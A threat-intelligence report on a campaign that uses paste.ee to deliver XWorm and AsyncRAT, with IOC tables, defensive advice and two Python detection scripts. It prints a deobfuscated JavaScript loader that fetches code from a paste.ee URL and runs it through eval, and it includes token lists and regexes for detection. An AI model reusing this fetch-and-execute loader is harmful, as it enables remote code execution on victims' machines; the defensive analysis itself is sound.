A recent investigation by cybersecurity researchers has revealed a highly stealthy malware distribution campaign abusing the legitimate paste.ee service as a command-and-control (C&C) hub.
The attackers use advanced obfuscation techniques in JavaScript droppers to deliver powerful remote access trojans (RATs) like XWorm and AsyncRAT, evading conventional security detection and complicating incident response efforts.
Obfuscated JavaScript Loader:
The attack chain begins with the distribution of weaponized JavaScript files. One such sample, disguised as “DOCUMENT FOR DELIVERY INFORMATION.js”, was uploaded to malware repositories and flagged due to behavioral markers reminiscent of RemcosRAT.
Obfuscation Mechanisms:
- Junk Unicode Insertion: The JavaScript loader inserts rare Unicode characters (such as ᙓೇᰖ∛ᩕዀ╬ᤳK⨀Ḣڑ⦝〒) throughout its strings and logic, making static analysis and detection challenging.
- String Reconstruction: These characters are removed at runtime to reconstruct key object names and URLs.
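Because the junk characters are stripped at runtime, a static signature that matches the raw bytes of "MSXML2.XMLHTTP" or "paste.ee" will miss the loader, while a rule that first strips non-ASCII code points will not. The following triage script is an added example and is not code from the original analysis; it builds its own constructed sample by injecting junk code points into a clean loader (the real dropper is not reproduced), and the token list, the 10% non-ASCII ratio threshold and the `analyze_script` name are assumptions chosen for the demonstration.

```python
import re

# Junk code points of the kind the analysis describes (rare scripts and symbols).
# This set is constructed for the demo; it is not the real dropper's character set.
JUNK = "ᙓೇᰖ∛ᩕዀ╬ᤳ⨀Ḣڑ⦝〒"

# Clean form of the loader pattern, with a placeholder paste id (constructed).
CLEAN_LOADER = (
    'var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");'
    'xmlhttp.open("GET", "http://paste.ee/d/EXAMPLE/0", false);'
    'xmlhttp.send();'
    'eval(xmlhttp.responseText);'
)


def inject_junk(text, every=3):
    """Constructed sample builder: append a junk code point after every `every` chars.
    The result mimics the byte-level shape of the obfuscated loader only; it is not
    valid JavaScript and is used purely as detector input."""
    out = []
    for i, ch in enumerate(text):
        out.append(ch)
        if i % every == every - 1:
            out.append(JUNK[i % len(JUNK)])
    return "".join(out)


OBFUSCATED_SAMPLE = inject_junk(CLEAN_LOADER)

# Tokens a triage rule keys on (assumed list, drawn from the loader behaviour described).
SUSPICIOUS_TOKENS = (
    "MSXML2.XMLHTTP",
    "ActiveXObject",
    "responseText",
    "eval(",
    "Function(",
    "paste.ee/",
)

# Same shape as the hunting regex in the report, without the line anchor.
PASTE_URL_RE = re.compile(r"https?://paste\.ee/[a-z]/[A-Za-z0-9]+/0")


def non_ascii_ratio(text):
    """Share of code points above 0x7F; junk-Unicode loaders score far above normal JS."""
    if not text:
        return 0.0
    return sum(1 for ch in text if ord(ch) > 127) / len(text)


def strip_non_ascii(text):
    """Emulate the loader's own runtime clean-up so hidden tokens become visible."""
    return "".join(ch for ch in text if ord(ch) <= 127)


def analyze_script(text, ratio_threshold=0.10):
    """Return the evidence a triage rule would key on for one script file.
    Tokens and URLs are searched in the ASCII-only view, so junk insertion
    between the characters of a keyword cannot hide it from the rule."""
    ascii_view = strip_non_ascii(text)
    ratio = non_ascii_ratio(text)
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in ascii_view]
    paste_urls = PASTE_URL_RE.findall(ascii_view)
    # Require both signals: a high junk ratio alone would flag scripts with
    # non-Latin comments, and the tokens alone appear in legitimate legacy code.
    suspicious = ratio >= ratio_threshold and len(hits) >= 2
    return {
        "non_ascii_ratio": round(ratio, 3),
        "tokens": hits,
        "paste_urls": paste_urls,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_LOADER), ("obfuscated", OBFUSCATED_SAMPLE)):
        print(label, analyze_script(sample))
```

Run it over `.js` files found in user directories (the location the report's behavioral-detection advice singles out); the two-signal rule keeps scripts with legitimate non-Latin comments from firing on ratio alone, and the recovered paste URL is the pivot for the infrastructure hunting described later.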
Network Communication:
- The dropper dynamically constructs a call to the MSXML2.XMLHTTP ActiveX object, initiating an HTTP GET request to an obfuscated paste.ee URL (e.g., http://paste.ee/d/s1uVin8i/0).
- The retrieved payload, typically more malicious code, is then executed via the JavaScript Function constructor.
Deobfuscated Loader Sample:
```javascript
// Pseudocode summary after removing junk Unicode and decoding logic
var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", "http://paste.ee/d/s1uVin8i/0", false);
xmlhttp.send();
// The analyzed sample runs the response through the Function constructor; eval() stands in for it here
eval(xmlhttp.responseText);
```
This loader model enables the adversary to swap payloads on demand simply by updating the paste at paste.ee—without altering the delivery infrastructure or initial dropper.
Infrastructure Analysis: From Paste.ee to RAT Command-and-Control
Malicious Paste.ee Usage
Researchers mapped a network of paste.ee URLs distributing encoded PE files, obfuscated scripts, and configuration data. Regex-based hunting revealed consistent patterns in malicious paste URLs (e.g., https:\/\/paste\.ee\/[a-z]\/[A-Za-z0-9]+\/0$), allowing defenders to programmatically extract and track related campaigns.
Extraction and Verification Process:
- Pulling URLs from NDJSON:
```bash
jq -r ".url" export.ndjson > urls.txt
```
- Verifying Live Targets:
```bash
httpx -l urls.txt -mc 200 -o 200urls.txt
```
- Malware Retrieval and Analysis:
- Extracted PE files showed reverse encoding and encryption.
- Decompilation and config decryption revealed XWorm activity and C2 details.
Command-and-Control (C2) Infrastructure
On decoding the configuration data, primary C2 domains such as abuwire123[.]ddns[.]net emerged, resolving to IPs like 45.145.43.244 (Frankfurt, Germany, ASN: AS58212). The C2 network spans both Europe and the U.S.; the observed listeners, all presenting AsyncRAT-labelled certificates, are summarized below:
| IP Address | Ports | Service | Certificate Label | First Seen |
|---|---|---|---|---|
| 45.145.43.244 | 6606 | XWorm C2 | AsyncRAT | Feb 24, 2025 |
| 66.63.187.154 | 6606 | AsyncRAT C2 | AsyncRAT | Feb 2025 |
| 66.63.187.232 | 8808 | XWorm C2 | AsyncRAT | Feb 2025 |
| 196.251.118.41 | 8808 | AsyncRAT C2 | AsyncRAT | Feb 2025 |
Technical Capabilities of XWorm:
- Keylogging and Data Exfiltration: XWorm captures keystrokes system-wide, logs sensitive data, and exfiltrates it via AES-encrypted C2 channels.
- Persistence and Recon: It sends periodic PINGs containing user, system, and window information to ensure connectivity and enable surveillance.
AsyncRAT Characteristics:
- An open-source C# RAT, forked and customized by numerous threat actors.
- Supports robust backdoor access, live monitoring, file theft, and lateral movement.
Threat Indicators and Mitigation Strategies
Indicators of Compromise (IOCs)
| IP Address | Domain | Hosting Company | Location |
|---|---|---|---|
| 45.145.43.244 | abuwire123[.]ddns[.]net | dataforest GmbH (ASN: AS58212) | Frankfurt, Germany |
| 66.63.187.154 | Not Available | QuadraNet Enterprises LLC | United States |
| 66.63.187.232 | abuwire123h[.]ddns[.]net abuwire123[.]duckdns[.]org | QuadraNet Enterprises LLC | United States |
| 196.251.118.41 | Not Available | Not Available | Not Available |
| 23.186.113.60 | paste.ee | Not Available | Not Available |
Defensive Measures
- Block Paste Patterns: Proactively block paste.ee URLs matching known malicious regex patterns.
- Monitor Ports: Flag or restrict outbound connections to non-standard ports 6606, 7707, 8808.
- Behavioral Detection: Alert on processes invoking ActiveX XMLHTTP calls in scripts and on highly obfuscated JavaScript in user directories.
- Update and Audit: Ensure endpoint security solutions can flag suspicious scripts even if not known malware and regularly audit for network connections to IOCs.
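The extraction process above (pull URLs from an NDJSON export, keep those matching the paste.ee pattern) and the first two defensive measures (block matching paste URLs, flag outbound connections to ports 6606, 7707 and 8808) are the same matching logic applied to two data sources. The script below is an added example, not code from the original report: it reimplements the `jq` step in Python against a constructed NDJSON export, then runs the IOC table and the port rule over constructed connection-log lines. The log line format, the function names and the choice to exempt internal destinations from the port rule are assumptions; the IOC IPs, domains and ports are the report's own values, with the defanged domains refanged for matching.

```python
import json
import re
from ipaddress import ip_address

# Hunting pattern from the report, anchored on the trailing /0 raw-download marker.
PASTE_PATTERN = re.compile(r"^https?://paste\.ee/[a-z]/[A-Za-z0-9]+/0$")

# IOC values from the report's tables (domains refanged). The paste.ee host itself
# is left out: blocking it wholesale is a policy decision, not a detection.
IOC_IPS = {"45.145.43.244", "66.63.187.154", "66.63.187.232", "196.251.118.41"}
IOC_DOMAINS = {"abuwire123.ddns.net", "abuwire123h.ddns.net", "abuwire123.duckdns.org"}
C2_PORTS = {6606, 7707, 8808}

# Constructed NDJSON export, one JSON object per line, the shape `jq -r ".url"` reads.
NDJSON_EXPORT = "\n".join([
    json.dumps({"url": "https://paste.ee/d/AbCd1234/0", "tag": "sample"}),
    json.dumps({"url": "https://paste.ee/p/AbCd1234", "tag": "view-page"}),  # no /0: not the raw form
    json.dumps({"url": "https://example.org/readme.txt", "tag": "benign"}),
    json.dumps({"url": "https://paste.ee/r/Zz99/0", "tag": "sample"}),
])


def hunt_paste_urls(ndjson_text):
    """Equivalent of `jq -r .url export.ndjson | grep -E <pattern>`."""
    hits = []
    for line in ndjson_text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        url = record.get("url", "")
        if PASTE_PATTERN.match(url):
            hits.append(url)
    return hits


# Constructed outbound-connection log: "<timestamp> <src_ip> -> <dst>:<port>" (assumed format).
CONN_LOG = """\
2025-02-24T10:01:02Z 10.0.0.15 -> 45.145.43.244:6606
2025-02-24T10:01:05Z 10.0.0.15 -> abuwire123.ddns.net:8808
2025-02-24T10:02:00Z 10.0.0.22 -> 203.0.113.10:443
2025-02-24T10:03:11Z 10.0.0.31 -> 10.0.0.5:7707
"""

LOG_RE = re.compile(r"^(\S+) (\S+) -> ([^:\s]+):(\d+)$")


def is_internal(dst):
    """True for RFC 1918 / private destinations; hostnames are treated as external."""
    try:
        return ip_address(dst).is_private
    except ValueError:
        return False


def match_connections(log_text):
    """Flag lines that reach an IOC IP or domain, or an external host on a known C2 port.
    The port rule skips internal destinations so that a local service that happens to
    listen on 7707 does not page the on-call analyst."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, src, dst, port = m.group(1), m.group(2), m.group(3), int(m.group(4))
        reasons = []
        if dst in IOC_IPS:
            reasons.append("ioc-ip")
        if dst.lower() in IOC_DOMAINS:
            reasons.append("ioc-domain")
        if port in C2_PORTS and not is_internal(dst):
            reasons.append(f"c2-port-{port}")
        if reasons:
            findings.append({"ts": ts, "src": src, "dst": dst, "port": port, "reasons": reasons})
    return findings


if __name__ == "__main__":
    print("paste hits:", hunt_paste_urls(NDJSON_EXPORT))
    for f in match_connections(CONN_LOG):
        print("alert:", f)
```

The paste list feeds the `httpx -mc 200` liveness check from the extraction process, and the connection findings map directly onto the port and IOC rules; a real deployment would resolve the IOC domains periodically, since dynamic-DNS names like the ddns.net and duckdns.org entries can move between the listed IPs.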
The innovative misuse of paste.ee as a rapidly updatable C&C hub, combined with sophisticated JavaScript obfuscation and a dispersed C2 infrastructure, demonstrates the evolving tactics of modern malware actors. XWorm and AsyncRAT remain potent threats, and defenders must adapt with multi-layered detection and robust network hygiene.